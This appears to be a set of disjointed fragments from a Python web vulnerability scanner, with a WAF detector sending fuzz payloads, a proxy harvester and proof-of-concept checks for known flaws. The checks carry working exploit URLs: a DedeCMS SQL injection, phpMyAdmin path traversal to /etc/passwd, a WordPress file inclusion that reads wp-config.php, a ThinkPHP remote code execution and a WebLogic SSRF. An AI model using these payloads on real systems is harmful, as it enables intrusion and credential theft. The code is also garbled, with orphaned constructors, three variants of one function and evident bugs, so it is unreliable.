def check_waf(target, logger_type, proxy = None):
# folder = Path.cwd().parent
# waf_file = str(folder / "data/waf_signature")
waf_file = "data/waf_signature"
logger = factory_logger(logger_type,target,"Waf")
with open(waf_file,'r') as loader:
waf_data = json.load(loader)
waf_match = {0: None}
waf_info = {'company': None,
'waf_type': None,
'bypass_known': None}
for intruder in waf_checker:
try:
target, payload = chambering(target, strike=True, payload=intruder)
response = requester(target, payload, GET=True, timeout=5, proxy=proxy)
if not response is None:
page, code, headers = response.text, response.status_code, response.headers
if code >= 400:
match = 0
for waf_name, waf_signature in waf_data.items():
if re.search(waf_signature['regex'],page,re.I):
match = match + 1
if "code" in waf_signature:
if re.search(waf_signature['code'],code,re.I):
match = match + 1
if "header" in waf_signature:
if re.search(waf_signature["header"],headers,re.I):
match = match +1
if match > max(waf_match,key=waf_match.get):
waf_info['company'] = waf_name
waf_info['waf_type'] = waf_signature['name']
if 'bypass_known' not in waf_signature:
waf_info['bypass_known'] = None
else:
waf_info['bypass_known'] = waf_signature['bypass_known']
waf_match.clear()
waf_match[match] : waf_info
except Exception:
pass
if max(waf_match,key=waf_match.get) > 0:
logger.info(match)
else:
print(f"{green}[!][{time}] Waf Information : No firewall detected !{end}")
def __init__(self,target,file,logger_type):
self.file = file
self.time = time
self.subdomains = set()
self.file_loader = asyncio.Queue()
self.loop = asyncio.get_event_loop()
self.domain = target.split(".", target.count(".") - 1)[-1]
self.resolver = aiodns.DNSResolver(timeout=3, loop=self.loop)
self.logger = factory_logger(logger_type, target, 'subdomain')
def detect_info(target, logger_type):
logger_middle = factory_logger(logger_type, target, "middleware")
print(f"{red}[!][{time}] Collecting middleware information....{end}")
info = {
'Waf': None,
'CDN': None,
'CMS': None,
'Web Servers': None,
'Web Frameworks': None,
'Operating Systems': None,
'JavaScript Frameworks': None,
'Programming Languages': None
}
keys = [
'Waf', 'CDN', 'Web Servers', 'Web Frameworks', 'Operating Systems',
'JavaScript Frameworks', 'Programming Languages'
]
url, data = chambering(target, strike=False)
try:
response = requester(url, data, GET=True)
whatweb_dict = {
"url": response.url,
"text": response.text,
"headers": dict(response.headers)
}
whatweb_dict = json.dumps(whatweb_dict)
whatweb_dict = whatweb_dict.encode()
whatweb_dict = zlib.compress(whatweb_dict)
data = {"info": whatweb_dict}
result = requests.post("http://whatweb.bugscaner.com/api.go",
files=data)
data_json = result.json()
data = dict(data_json)
except Exception:
pass
if 'error' not in data:
for key in keys:
if key in dict(data):
info[key] = data[key]
logger_middle.info(info)
return info
else:
info.clear()
info['message'] = "Error Message!"
logger_middle.info(info)
def tomcat_cve_2018_11759(self):
url = self.url + "/jkstatus;?cmd=dump"
try:
response = requests.get(url, timeout=5)
if response.status_code == 200 and "ServerRoot=*" in response.text:
self.logger.critical(f"url : {url}\n"
f"Tomcat_cve_2018_11759 exists !\n")
except Exception:
self.logger_ = factory_logger(self.logger_type, self.target,
"poc not found")
self.logger_.info("Tomcat_cve_2018_11759 not found !")
def dedecms_membergroup_sqli(self):
url = self.url + "/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+123456789+--+@`'`"
try:
response = requests.get(url, timeout=5)
if response.status_code == 200 and "123456789" in response.text:
self.logger.critical(f"url : {url}\n"
f"Dedecms_membergroup_sqli exists !\n")
except Exception:
self.logger_ = factory_logger(self.logger_type, self.target,
"poc not found")
self.logger_.info("Dedecms_membergroup_sqli not found !")
def weblogic_ssrf(self):
url = self.url + "/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.1.1.1:700"
try:
response = requests.get(url, timeout=5)
if response.status_code == 200 and "'127.1.1.1'" in response.text or "Socket Closed" in response.text:
self.logger.critical(f"url : {url}\n"
f"Weblogic_ssrf exists !\n")
except Exception:
self.logger_ = factory_logger(self.logger_type, self.target,
"poc not found")
self.logger_.info("Weblogic ssrf not found !")
def __init__(self,target,logger_type,subdomain_queue = None,file = None):
self.file = file
self.target = target
self.requests_seen = set()
self.filter_ = Filter.filter
self.logger_type = logger_type
self.target_url = queue.Queue()
self.Attack_target = queue.Queue()
self.target_domain = queue.Queue()
self.domain = extract_domain(target)
self.subdomains_queue = subdomain_queue
self.logger = factory_logger(logger_type,target,"vulnerable")
def dedecms_file_inclusion(self):
url = self.url + r'/plus/carbuyaction.php?dopost=return&code=../../'
try:
response = requests.get(url, timeout=5)
if response.status_code == 200:
self.logger.critical(f"url : {url}\n"
f"Dedecms_file_inclusion exists !\n")
except Exception:
self.logger_ = factory_logger(self.logger_type, self.target,
"poc not found")
self.logger_.info("Dedecms_file_inclusion not found !")
def phpmyadmin_CVE_2018_12613(self):
url = self.url + r'/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd'
try:
response = requests.get(url, timeout=5)
if response.status_code == 200 and re.match(
r'root:[x*]:0:0:', response.text, re.I):
self.logger.critical(f"url : {url}\n"
f"Phpmyadmin_CVE_2018_12613 exists !\n")
except Exception:
self.logger_ = factory_logger(self.logger_type, self.target,
"poc not found")
self.logger_.info("Phpmyadmin_CVE_2018_12613 not found !")
def wordpress_lfi(self):
url = self.url + "/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php"
try:
response = requests.get(url, timeout=5)
if response.status_code == 200 and "DB_NAME" in response.text and "DB_USER" in response.text and "DB_PASSWORD" in response.text:
self.logger.critical(
f"url : {url}\n"
f"Wordpress Local file include exists !\n")
except:
self.logger_ = factory_logger(self.logger_type, self.target,
"poc not found")
self.logger_.info("Wordpress Local file include not found !")
def thinkphp_RCE_CVE_2018_5955(self):
print(f"")
url = self.url + r'/index.php?s=/Index/\think\app/invokefunction&function=' \
r'call_user_func_array&vars[0]=phpinfo&vars[1][]=-1'
try:
response = requester(url, data=None, GET=True, timeout=5)
if response.status_code == 500 and 'PHP' in response.text and 'System' in response.text:
self.logger.critical(f"url : {url}\n"
f"Thinkphp_RCE_CVE_2018_5955 exists !\n")
except Exception:
self.logger_ = factory_logger(self.logger_type, self.target,
"poc not found")
self.logger_.info("Thinkphp_RCE_CVE_2018_5955 not found !")
def __init__(self,target,logger_type):
self.filter_proxy = set()
self.container = queue.Queue()
# self.logger = factory_logger("StreamLogger","qq.com","proxy_generator")
self.logger = factory_logger(logger_type, target, "proxy_generator")
# self.filter_proxy = Filter()
self.dic = {
'data5u' : regex.data5u,
'xicidaili' : regex.xicidaili,
'iphai' : regex.iphai,
'xiladaili' : regex.xiladaili,
'ip3366' : regex.ip3366,
'ip_jiangxianli' : regex.jiangxianli,
'ip_huan' : regex.ip_huan
}
self.list_name = ['data5u', 'xicidaili', 'iphai']
def __init__(self,
url,
logger_type,
middleware_info=None,
middleware_type=None):
self.url = url
self._dic = middleware_info
self.target = url
self.logger_type = logger_type
self.logger = factory_logger(logger_type, url, "poc")
self.middleware_type = middleware_type
self.midd_dic = {
"thinkphp": self.thinkphp_RCE_CVE_2018_5955,
"phpmyadmin": self.phpmyadmin_CVE_2018_12613,
"dedecms":
(self.dedecms_file_inclusion, self.dedecms_membergroup_sqli),
"tomcat": self.tomcat_cve_2018_11759,
"weblogic": self.weblogic_ssrf,
"wordpress": self.wordpress_lfi
}
def check_waf(target, logger_type, proxy = None):
original_target = target
if "=" not in original_target: # 检验URL是否有效
print(f"{red}[!][{time}] Please provide a url with parameters! {end}")
quit()
# folder = Path.cwd().parent # Debug 使用
# waf_file = str(folder / "data/waf_signature")
waf_file = "data/waf_signature"
logger = factory_logger(logger_type,target,"Waf")
with open(waf_file,'r') as loader: # 加载WAF指纹信息
waf_data = json.load(loader)
waf_match = {0: None}
waf_info = {'company': None,
'waf_type': None,
'bypass_known': None}
for intruder in waf_checker: # 加载fuzz payload , 测试waf
try:
intruder_type = "XSS" if intruder.startswith("<") else "SQLi"
target, payload = chambering(original_target, strike=True, payload=intruder,type = intruder_type) # ('www.baidu.com', {'a': '1', 'bb': '22'})
response = requester(target, payload, GET=True, timeout=5, proxy=proxy) # 发送payload
print(f"{purple}[~][{time}] using {intruder} to detect WAF !{end}")
if not response is None:
page, code, headers = response.text, response.status_code, response.headers
if code >= 400:
match = 0
for waf_name, waf_signature in waf_data.items(): # 返回信息与WAF指纹库匹配 大小写不敏感
if re.search(waf_signature['regex'],page,re.I):
match = match + 1
if "code" in waf_signature:
if re.search(waf_signature['code'],code,re.I):
match = match + 1
if "header" in waf_signature:
if re.search(waf_signature["header"],headers,re.I):
match = match +1
if match > max(waf_match,key=waf_match.get): # 取waf_match字典中的key最大值,做判断 获取到最佳匹配
waf_info['company'] = waf_name
waf_info['waf_type'] = waf_signature['name']
if 'bypass_known' not in waf_signature: # 检测有没有绕过方法
waf_info['bypass_known'] = None
else:
waf_info['bypass_known'] = waf_signature['bypass_known']
waf_match.clear()
waf_match[match] : waf_info
except Exception:
pass
if max(waf_match,key=waf_match.get) > 0: # 输出匹配到的WAF信息
logger.info(match)
else:
print(f"{green}[!][{time}] Waf Information : No firewall detected !{end}")
def check_waf(target, logger_type, proxy = None):
original_target = target
if "=" not in original_target:
print(f"{red}[!][{time}] Please provide a url with parameters! {end}")
quit()
# folder = Path.cwd().parent
# waf_file = str(folder / "data/waf_signature")
waf_file = "data/waf_signature"
logger = factory_logger(logger_type,target,"Waf")
with open(waf_file,'r') as loader:
waf_data = json.load(loader)
waf_match = {0: None}
waf_info = {'company': None,
'waf_type': None,
'bypass_known': None}
for intruder in waf_checker:
try:
intruder_type = "XSS" if intruder.startswith("<") else "SQLi"
target, payload = chambering(original_target, strike=True, payload=intruder,type = intruder_type)
response = requester(target, payload, GET=True, timeout=5, proxy=proxy)
print(f"{purple}[~][{time}] using {intruder} to detect WAF !{end}")
if code >= 400 and not response is None:
match = 0
page, code, headers = response.text, response.status_code, response.headers
for waf_name, waf_signature in waf_data.items():
if re.search(waf_signature['regex'],page,re.I):
match = match + 1
if "code" in waf_signature:
if re.search(waf_signature['code'],code,re.I):
match = match + 1
if "header" in waf_signature:
if re.search(waf_signature["header"],headers,re.I):
match = match +1
if match > max(waf_match,key=waf_match.get):
waf_info['company'] = waf_name
waf_info['waf_type'] = waf_signature['name']
if 'bypass_known' not in waf_signature:
waf_info['bypass_known'] = None
else:
waf_info['bypass_known'] = waf_signature['bypass_known']
waf_match.clear()
waf_match[match] : waf_info
except Exception:
pass
if max(waf_match,key=waf_match.get) > 0:
logger.info(match)
else:
print(f"{green}[!][{time}] Waf Information : No firewall detected !{end}")
